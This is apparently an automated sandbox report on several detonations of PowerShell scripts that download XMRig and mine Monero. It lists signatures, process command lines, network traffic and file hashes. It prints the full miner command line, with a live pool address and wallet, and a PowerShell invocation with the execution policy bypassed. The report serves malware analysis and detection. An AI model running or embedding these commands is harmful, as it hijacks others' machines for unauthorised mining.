memory/3612-88-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-89-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-90-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-91-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-92-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-93-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-94-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-95-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-96-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-97-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-98-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-99-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-100-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-101-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-102-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-103-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-104-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-105-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-106-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-107-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-108-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-109-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-110-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-111-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-112-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-113-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-114-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-115-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-116-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-117-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-118-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-119-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:13

Platform

win11-20240611-en

Max time kernel

1798s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp

Files

memory/1312-0-0x00007FFA1FC63000-0x00007FFA1FC65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5iaxiemm.wa3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1312-9-0x00000213D39A0000-0x00000213D39C2000-memory.dmp

memory/1312-10-0x00007FFA1FC60000-0x00007FFA20722000-memory.dmp

memory/1312-11-0x00007FFA1FC60000-0x00007FFA20722000-memory.dmp

memory/1312-12-0x00007FFA1FC60000-0x00007FFA20722000-memory.dmp

memory/1312-14-0x00000213D3B70000-0x00000213D3B82000-memory.dmp

memory/1312-15-0x00000213D3B50000-0x00000213D3B5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4704-46-0x00000206A6600000-0x00000206A6620000-memory.dmp

memory/1312-48-0x00007FFA1FC60000-0x00007FFA20722000-memory.dmp

memory/1312-47-0x00007FFA1FC63000-0x00007FFA1FC65000-memory.dmp

memory/4704-49-0x00000206A7FF0000-0x00000206A8010000-memory.dmp

memory/1312-50-0x00007FFA1FC60000-0x00007FFA20722000-memory.dmp

memory/1312-52-0x00007FFA1FC60000-0x00007FFA20722000-memory.dmp

memory/4704-51-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-53-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-55-0x00000206A8030000-0x00000206A8050000-memory.dmp

memory/4704-54-0x00000206A8010000-0x00000206A8030000-memory.dmp

memory/4704-56-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-57-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-59-0x00000206A8030000-0x00000206A8050000-memory.dmp

memory/4704-58-0x00000206A8010000-0x00000206A8030000-memory.dmp

memory/4704-60-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-61-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-62-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-63-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-64-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-65-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-66-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-67-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-68-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-69-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-70-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-71-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-72-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-73-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-74-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-75-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-76-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-77-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-78-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-79-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-80-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-81-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-82-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-83-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-84-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-85-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-86-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-87-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-88-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-89-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-90-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-91-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-92-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-93-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-94-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-95-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-96-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-97-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-98-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-99-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-100-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-101-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-102-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-103-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-104-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-105-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-106-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-107-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-108-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-109-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-110-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-111-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-112-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-113-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-114-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-115-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-116-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-117-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

memory/4704-118-0x00007FF66CA80000-0x00007FF66D6B3000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:25

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1790s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 63.141.182.52.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp

Files

memory/3652-3-0x00007FFFA44F3000-0x00007FFFA44F4000-memory.dmp

memory/3652-5-0x000002202E420000-0x000002202E442000-memory.dmp

memory/3652-7-0x00007FFFA44F0000-0x00007FFFA4EDC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jw4uc2si.pbo.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3652-9-0x000002202E5D0000-0x000002202E646000-memory.dmp

memory/3652-18-0x00007FFFA44F0000-0x00007FFFA4EDC000-memory.dmp

memory/3652-25-0x00007FFFA44F0000-0x00007FFFA4EDC000-memory.dmp

memory/3652-48-0x000002202E590000-0x000002202E5A2000-memory.dmp

memory/3652-61-0x0000022015E40000-0x0000022015E4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4712-90-0x00000293442D0000-0x00000293442F0000-memory.dmp

memory/4712-91-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/3652-92-0x00007FFFA44F0000-0x00007FFFA4EDC000-memory.dmp

memory/3652-93-0x00007FFFA44F3000-0x00007FFFA44F4000-memory.dmp

memory/4712-94-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/3652-95-0x00007FFFA44F0000-0x00007FFFA4EDC000-memory.dmp

memory/4712-96-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-97-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-98-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-99-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-100-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-101-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-102-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-103-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-104-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-105-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-106-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-107-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-108-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-109-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-110-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-111-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-112-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-113-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-114-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-115-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-116-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-117-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-118-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-119-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-120-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-121-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-122-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-123-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-124-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-125-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-126-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-127-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-128-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-129-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-130-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-131-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-132-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-133-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-134-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-135-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-136-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-137-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-138-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-139-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-140-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-141-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-142-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-143-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-144-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-145-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-146-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-147-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-148-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-149-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-150-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-151-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-152-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-153-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-154-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-155-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

memory/4712-156-0x00007FF768D80000-0x00007FF7699B3000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 07:56

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

memory/420-3-0x00007FFA54283000-0x00007FFA54284000-memory.dmp

memory/420-5-0x0000023453850000-0x0000023453872000-memory.dmp

memory/420-8-0x00007FFA54280000-0x00007FFA54C6C000-memory.dmp

memory/420-9-0x0000023453B70000-0x0000023453BE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zczw0pms.v2u.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
